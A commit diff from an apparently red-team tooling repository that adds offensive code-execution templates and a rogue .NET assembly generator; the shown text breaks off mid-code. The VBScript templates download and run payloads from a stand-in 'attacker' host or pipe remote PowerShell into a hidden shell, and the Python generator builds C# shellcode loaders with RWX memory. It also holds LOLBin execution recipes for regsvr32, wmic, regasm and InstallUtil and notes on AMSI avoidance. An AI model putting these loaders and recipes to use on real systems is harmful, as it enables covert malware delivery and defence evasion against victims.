Added code-exec-templates and some additions to rogue-dot-net

This commit is contained in:
mgeeky 2020-05-07 01:42:52 +02:00
parent b7c7da7b4e
commit 8b03b5ba40
14 changed files with 806 additions and 723 deletions

View File

@ -1,39 +1,39 @@
#!/bin/bash #!/bin/bash
modname=security2 modname=security2
friendlyname=WAF friendlyname=WAF
if [ $# -ne 1 ]; then if [ $# -ne 1 ]; then
echo "Usage: ./toggleWaf <on|off|status>" echo "Usage: ./toggleWaf <on|off|status>"
exit 1 exit 1
fi fi
case $1 in case $1 in
"on") "on")
if [ $EUID -ne 0 ]; then if [ $EUID -ne 0 ]; then
echo "[!] This function must be run as root. Use sudo." echo "[!] This function must be run as root. Use sudo."
exit 1 exit 1
fi fi
a2enmod $modname > /dev/null a2enmod $modname > /dev/null
systemctl reload apache2 systemctl reload apache2
echo "[+] $friendlyname enabled." echo "[+] $friendlyname enabled."
;; ;;
"off") "off")
if [ $EUID -ne 0 ]; then if [ $EUID -ne 0 ]; then
echo "[!] This function must be run as root. Use sudo." echo "[!] This function must be run as root. Use sudo."
exit 1 exit 1
fi fi
a2dismod $modname > /dev/null a2dismod $modname > /dev/null
systemctl reload apache2 systemctl reload apache2
echo "[-] $friendlyname disabled." echo "[-] $friendlyname disabled."
;; ;;
"status") "status")
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
echo "[+] $friendlyname is enabled." echo "[+] $friendlyname is enabled."
else else
echo "[-] $friendlyname is disabled." echo "[-] $friendlyname is disabled."
fi fi
;; ;;
esac esac

View File

@ -1,67 +1,71 @@
### A small collection of unobfuscated code-execution primitives in different languages ### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** - `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI** - `wscript.exe` - For general scripts execution. **This one loads AMSI**
--- ---
#### VBScript #### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` - **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` - **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. - **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` - **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
---
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
#### JScript
---
---
#### JScript
#### XSL
XSL files can be executed in the following ways: ---
- Using `wmic.exe`: #### XSL
```
wmic os get /format:"jscript-xslt-template.xsl" XSL files can be executed in the following ways:
```
- Using `wmic.exe`:
Templates: ```
wmic os get /format:"jscript-xslt-template.xsl"
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. ```
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
--- - **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
#### COM Scriptlets
Sample code execution with `regsvr32` can be following: ---
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll #### COM Scriptlets
```
Sample code execution with `regsvr32` can be following:
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` ```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
---
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
#### HTA
HTA files are HTML Applications ---
#### HTA
HTA files are HTML Applications
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ - **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_

View File

@ -1,38 +1,36 @@
' '
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
downloadURL = "http://attacker/payload.exe" downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe" saveAs = "%TEMP%\foo.exe"
parameters = "" parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell") Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs) out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File ' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False xhr.Open "GET", downloadURL, False
xhr.Send xhr.Send
' STEP 2: Save binary file ' STEP 2: Save binary file
If xhr.Status = 200 Then If xhr.Status = 200 Then
With CreateObject("Adodb.Stream") With CreateObject("Adodb.Stream")
.Open .Open
.Type = 1 .Type = 1
.write xhr.responseBody .write xhr.responseBody
.savetofile out, 2 .savetofile out, 2
End With End With
' STEP 3: Execute file ' STEP 3: Execute file
cmd = out & " " & parameters cmd = out & " " & parameters
MsgBox cmd sh.Run cmd, 0, False
sh.Run cmd, 0, False End If
End If Set sh = Nothing
Set sh = Nothing
Set xhr = Nothing Set xhr = Nothing

View File

@ -0,0 +1,34 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
scriptURL = "http://attacker/script.ps1"
launcher = "powershell -nop -w hid -Command -"
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", scriptURL, False
xhr.Send
Function bin2a(Binary)
Dim I,S
For I = 1 to LenB(Binary)
S = S & Chr(AscB(MidB(Binary,I,1)))
Next
bin2a = S
End Function
If xhr.Status = 200 Then
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine bin2a(xhr.responseBody)
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
End If
Set xhr = Nothing

View File

@ -0,0 +1,47 @@
'
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
saveFileAs = "%TEMP%\foo.exe"
launchParameters = ""
' =============================================================
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
' =============================================================
Function Base64Decode(ByVal vCode)
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
End Function
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveFileAs)
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write Base64Decode(fileBuffer)
.savetofile out, 2
End With
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
command = out & " " & launchParameters
proc.Create command, Null, conf, intProcessID

View File

@ -1,15 +1,15 @@
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet <stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder" xmlns:user="placeholder"
version="1.0"> version="1.0">
<output method="text"/> <output method="text"/>
<ms:script implements-prefix="user" language="JScript"> <ms:script implements-prefix="user" language="JScript">
<![CDATA[ <![CDATA[
// Hello world // Hello world
var shell = new ActiveXObject("WScript.Shell"); var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!"); shell.Popup("Hello world from JScript XSL!");
]]> </ms:script> ]]> </ms:script>
</stylesheet> </stylesheet>

View File

@ -1,20 +1,20 @@
' '
' This script uses WMI class' Win32_Process static method Create to ' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12). ' execute given command in a hidden window (ShowWindow = 12).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
computer = "." computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2") & computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup") Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_ Set conf = startup.SpawnInstance_
conf.ShowWindow = 12 conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create command, Null, conf, intProcessID proc.Create command, Null, conf, intProcessID

View File

@ -1,13 +1,13 @@
' '
' This script uses classic WScript.Shell Run method to ' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0) ' execute given command in a hidden window (second param = 0)
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
With CreateObject("WScript.Shell") With CreateObject("WScript.Shell")
.Run command, 0, False .Run command, 0, False
End With End With

View File

@ -1,15 +1,15 @@
<?XML version="1.0"?> <?XML version="1.0"?>
<scriptlet> <scriptlet>
<registration <registration
progid="Foo" progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript"> <script language="JScript">
<![CDATA[ <![CDATA[
var command = "notepad.exe"; var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command); var r = new ActiveXObject("WScript.Shell").Run(command);
]]> ]]>
</script> </script>
</registration> </registration>
</scriptlet> </scriptlet>

View File

@ -1,14 +1,14 @@
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet <stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder" xmlns:user="placeholder"
version="1.0"> version="1.0">
<output method="text"/> <output method="text"/>
<ms:script implements-prefix="user" language="JScript"> <ms:script implements-prefix="user" language="JScript">
<![CDATA[ <![CDATA[
var command = "notepad"; var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command); var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script> ]]> </ms:script>
</stylesheet> </stylesheet>

View File

@ -1,14 +1,14 @@
<html> <html>
<head> <head>
<script language="VBScript"> <script language="VBScript">
Sub foo Sub foo
command = "notepad.exe" command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell") Set objShell = CreateObject("Wscript.Shell")
objShell.Run command objShell.Run command
End Sub End Sub
foo() foo()
</script> </script>
</head> </head>
<body> <body>
</body> </body>
</html> </html>

View File

@ -1,19 +1,19 @@
' '
' This script uses classic WScript.Shell Exec method to ' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated ' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example). ' launcher command (powershell.exe in this example).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -" launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell") With CreateObject("WScript.Shell")
With .Exec(launcher) With .Exec(launcher)
.StdIn.WriteLine command .StdIn.WriteLine command
.StdIn.WriteBlankLines 1 .StdIn.WriteBlankLines 1
.Terminate .Terminate
End With End With
End With End With

View File

@ -1,90 +1,90 @@
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution ## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) - [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) - [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) - [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
### Step 1: Generate key.snk file ### Step 1: Generate key.snk file
``` ```
powershell -file build.ps1 powershell -file build.ps1
``` ```
### Step 2: Generate source code file ### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage: Usage:
``` ```
python3 generateRogueDotNet.py --help python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile> usage: .\generateRogueDotNet.py [options] <inputFile>
positional arguments: positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments: optional arguments:
-h, --help show this help message and exit -h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
``` ```
Sample use case: Sample use case:
``` ```
python3 generateRogueDotNet.py -r notepad64.bin > program.cs python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode. [?] File specified as raw Shellcode.
``` ```
### Step 3: Compilate library .NET Assembly ### Step 3: Compilate library .NET Assembly
``` ```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
``` ```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
``` ```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
``` ```
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: ### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
- x86: - x86:
``` ```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
``` ```
- x64: - x64:
``` ```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
``` ```

View File

@ -1,387 +1,387 @@
#!/usr/bin/python3 #!/usr/bin/python3
# #
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. # Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
# #
# Step 1: Generate source code file # Step 1: Generate source code file
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs # cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
# #
# Step 2: Compilate library .NET Assembly # Step 2: Compilate library .NET Assembly
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used # if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). # to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
# Then proper compilation command will be: # Then proper compilation command will be:
# #
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: # Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
# x86: # x86:
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# x64: # x64:
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz B. / mgeeky, <mb@binary-offensive.com>
# #
import re import re
import os import os
import io import io
import sys import sys
import gzip import gzip
import base64 import base64
import string import string
import struct import struct
import random import random
import binascii import binascii
import argparse import argparse
def getCompressedPayload(filePath): def getCompressedPayload(filePath):
out = io.BytesIO() out = io.BytesIO()
encoded = '' encoded = ''
with open(filePath, 'rb') as f: with open(filePath, 'rb') as f:
inp = f.read() inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo: with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp) fo.write(inp)
encoded = base64.b64encode(out.getvalue()) encoded = base64.b64encode(out.getvalue())
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
encoded.decode() encoded.decode()
) )
return powershell return powershell
def getSourceFileContents(payload, _format): def getSourceFileContents(payload, _format):
launchCode = '' launchCode = ''
usings = '' usings = ''
if _format == 'exe': if _format == 'exe':
exeLaunchCode = string.Template(''' exeLaunchCode = string.Template('''
public static void Execute() { public static void Execute() {
string payload = "$payload2"; string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload); byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded); Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint; MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null); method.Invoke(instance, null);
}''').safe_substitute( }''').safe_substitute(
payload2 = base64.b64encode(payload.encode()).decode() payload2 = base64.b64encode(payload.encode()).decode()
) )
launchCode = exeLaunchCode launchCode = exeLaunchCode
elif _format == 'raw': elif _format == 'raw':
foo = str(binascii.hexlify(payload), 'ascii') foo = str(binascii.hexlify(payload), 'ascii')
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
encodedPayload = ' ' encodedPayload = ' '
for i in range(len(fooarr)): for i in range(len(fooarr)):
if i % 16 == 0 and i > 0: if i % 16 == 0 and i > 0:
encodedPayload += '\n ' encodedPayload += '\n '
encodedPayload += '{}, '.format(fooarr[i]) encodedPayload += '{}, '.format(fooarr[i])
encodedPayload = encodedPayload.strip()[:-1] encodedPayload = encodedPayload.strip()[:-1]
shellcodeLoader = string.Template(''' shellcodeLoader = string.Template('''
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern IntPtr VirtualAlloc( private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize, IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType, UInt32 flAllocationType,
UInt32 flProtect UInt32 flProtect
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool VirtualFree( private static extern bool VirtualFree(
IntPtr lpAddress, IntPtr lpAddress,
UInt32 dwSize, UInt32 dwSize,
UInt32 dwFreeType UInt32 dwFreeType
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern IntPtr CreateThread( private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes, UInt32 lpThreadAttributes,
UInt32 dwStackSize, UInt32 dwStackSize,
IntPtr lpStartAddress, IntPtr lpStartAddress,
IntPtr param, IntPtr param,
UInt32 dwCreationFlags, UInt32 dwCreationFlags,
ref UInt32 lpThreadId ref UInt32 lpThreadId
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool CloseHandle( private static extern bool CloseHandle(
IntPtr hHandle IntPtr hHandle
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( private static extern UInt32 WaitForSingleObject(
IntPtr hHandle, IntPtr hHandle,
UInt32 dwMilliseconds UInt32 dwMilliseconds
); );
private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000; private static UInt32 MEM_RELEASE = 0x8000;
public static void Execute() { public static void Execute() {
byte[] payload = new byte[$payloadSize] { byte[] payload = new byte[$payloadSize] {
$payload2 $payload2
}; };
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length); Marshal.Copy(payload, 0, funcAddr, payload.Length);
